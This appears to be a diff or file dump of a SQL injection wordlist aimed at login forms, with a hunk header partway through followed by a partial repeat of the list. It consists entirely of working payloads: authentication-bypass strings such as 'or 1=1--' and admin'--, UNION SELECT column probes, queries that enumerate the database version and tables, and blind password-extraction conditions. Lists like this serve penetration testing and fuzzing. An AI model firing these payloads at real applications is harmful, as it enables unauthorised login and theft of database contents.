|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
